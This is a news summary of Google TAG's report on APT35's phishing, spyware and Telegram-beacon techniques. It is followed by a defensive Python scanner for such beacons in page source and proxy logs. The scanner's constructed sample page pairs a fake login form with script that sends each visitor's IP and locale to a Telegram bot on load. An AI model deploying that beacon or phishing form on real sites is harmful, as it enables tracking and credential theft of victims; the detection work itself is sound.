The Threat Analysis Group (TAG), Google's team for countering targeted attacks against Google services and their users, has published a warning about APT35, a hacker group backed by the Iranian government. In the warning, TAG explains the methods APT35 has used.
According to TAG, APT35 conducts espionage on behalf of the Iranian government and most recently targeted the email credentials of an election official during the 2020 US presidential election.
In early 2021, APT35 compromised a website affiliated with a UK university and sent emails inviting targets to a fake online seminar. To "attend" the seminar, targets were asked to sign in with credentials such as a Google or Microsoft account and then to enter the two-step verification code sent to their device.
According to TAG, APT35 has used this approach since around 2017, targeting government institutions, academic institutions, media companies, NGOs and similar organizations.
In May 2020, TAG discovered that APT35 was attempting to upload spyware to the Google Play Store. The app posed as VPN software and, once installed, stole sensitive information such as the contents of calls and text messages, contacts and location data. It was detected and removed from the Google Play Store before any user installed it, but in July 2021 the group reportedly tried to distribute similar apps through app stores other than Google Play.
One of the most prominent APT35 techniques described by TAG is impersonating conference officials. APT35 first sent an email about a conference actually being held in Italy and, if the target replied, followed up with an email containing a phishing link. According to TAG, clicking the link in the second email redirected the target to a phishing domain. APT35 used URL-shortening services to disguise its URLs, and in some cases a page disguised as a Google Form redirected the target to the phishing site.
A newer APT35 technique is the use of Telegram, a messaging service. APT35 embedded JavaScript in its phishing pages that notifies the attackers through a Telegram bot whenever a page is loaded, sending the visitor's IP address and locale through a public channel, so that every visitor is reported regardless of who they are.
TAG reported the bot APT35 used for these messages to Telegram, which has since removed it. TAG encourages administrators to take attack-warning notifications seriously, enroll in Google's Advanced Protection Program, and use two-factor authentication. Related information can be found here.
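The Telegram beacon described above leaves a recognizable trace: a phishing page's script calls the public Telegram Bot API (`https://api.telegram.org/bot<token>/<method>`), usually right after reading the visitor's locale and looking up their IP. The following added example, which is not code from the article or from TAG, shows how a defender could scan captured phishing page source and web-proxy logs for that pattern. The sample page, the bot token, the log format and the hostnames in it are all constructed for the example.

```python
import re
from dataclasses import dataclass, field
from typing import List
from urllib.parse import urlsplit

# The Telegram Bot API URL shape is public: https://api.telegram.org/bot<token>/<method>,
# where <token> is "<numeric bot id>:<secret>". The secret is redacted in findings so
# a report can be shared without republishing a working token.
TELEGRAM_BOT_URL = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{20,})/(?P<method>[A-Za-z]+)"
)

# Hints that the page gathers visitor context (locale, IP) and fires on page load.
CONTEXT_HINTS = {
    "locale": re.compile(r"navigator\.languages?", re.I),
    "ip_lookup": re.compile(r"ipify|ip-api|ipinfo|icanhazip", re.I),
    "on_load": re.compile(r"window\.onload|DOMContentLoaded|addEventListener\(\s*['\"]load['\"]", re.I),
}


@dataclass
class Finding:
    bot_id: str
    method: str
    redacted_token: str
    hints: List[str] = field(default_factory=list)


def scan_page_source(html: str) -> List[Finding]:
    """One Finding per distinct (bot id, API method) beacon in a page's HTML/JS."""
    hints = [name for name, rx in CONTEXT_HINTS.items() if rx.search(html)]
    seen, findings = set(), []
    for m in TELEGRAM_BOT_URL.finditer(html):
        key = (m["bot_id"], m["method"])
        if key in seen:
            continue
        seen.add(key)
        redacted = f"{m['bot_id']}:{m['secret'][:4]}..."
        findings.append(Finding(m["bot_id"], m["method"], redacted, hints))
    return findings


def scan_proxy_log(lines: List[str]) -> List[str]:
    """Return client IPs whose browser pages called the Telegram Bot API.

    Constructed log format (an assumption for this example):
        "<timestamp> <client_ip> <http_method> <url> referer=<url|->"
    A Referer pointing at an ordinary web page means the call came from script on
    that page, which is the beacon pattern; a user's own Telegram session does not
    call the Bot API with a third-party page as Referer.
    """
    flagged = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5 or not parts[4].startswith("referer="):
            continue
        client_ip, url, referer = parts[1], parts[3], parts[4][len("referer="):]
        target = urlsplit(url)
        if (target.hostname or "") != "api.telegram.org" or not target.path.startswith("/bot"):
            continue
        ref_host = urlsplit(referer).hostname or ""
        if referer != "-" and not ref_host.endswith("telegram.org"):
            flagged.append(client_ip)
    return flagged


# Constructed sample page: a credential-phishing form whose script reports the
# visitor's IP and locale to a Telegram bot on load. The token is made up.
SAMPLE_PAGE = """<html><body>
<form action="/login"><input name="user"><input name="pass" type="password"></form>
<script>
window.addEventListener("load", function () {
  fetch("https://api.ipify.org?format=json").then(r => r.json()).then(d => {
    var msg = "visit " + d.ip + " " + navigator.language;
    fetch("https://api.telegram.org/bot1234567890:AAFexampleSecretTokenValue00/sendMessage"
          + "?chat_id=-100111&text=" + encodeURIComponent(msg));
  });
});
</script></body></html>"""

# Constructed proxy log lines in the format documented in scan_proxy_log.
SAMPLE_LOG = [
    "2021-10-14T09:12:01Z 10.0.0.12 GET https://webinar-login.example/ referer=-",
    "2021-10-14T09:12:02Z 10.0.0.12 GET https://api.ipify.org/?format=json referer=https://webinar-login.example/",
    "2021-10-14T09:12:02Z 10.0.0.12 GET https://api.telegram.org/bot1234567890:AAFexampleSecretTokenValue00/sendMessage?chat_id=-100111&text=visit referer=https://webinar-login.example/",
    "2021-10-14T09:15:40Z 10.0.0.33 GET https://web.telegram.org/k/ referer=-",
]

if __name__ == "__main__":
    for f in scan_page_source(SAMPLE_PAGE):
        print(f"bot {f.redacted_token} method={f.method} hints={f.hints}")
    print("clients reached by a page beacon:", scan_proxy_log(SAMPLE_LOG))
```

The page scanner is useful on phishing kits and takedown captures, and the redacted bot id is enough to file an abuse report with Telegram, as TAG did. The proxy-log check is the network-side counterpart: a browser request to `api.telegram.org/bot...` with an ordinary site as Referer is worth an alert on its own, because that combination is how a page-load beacon looks from the egress.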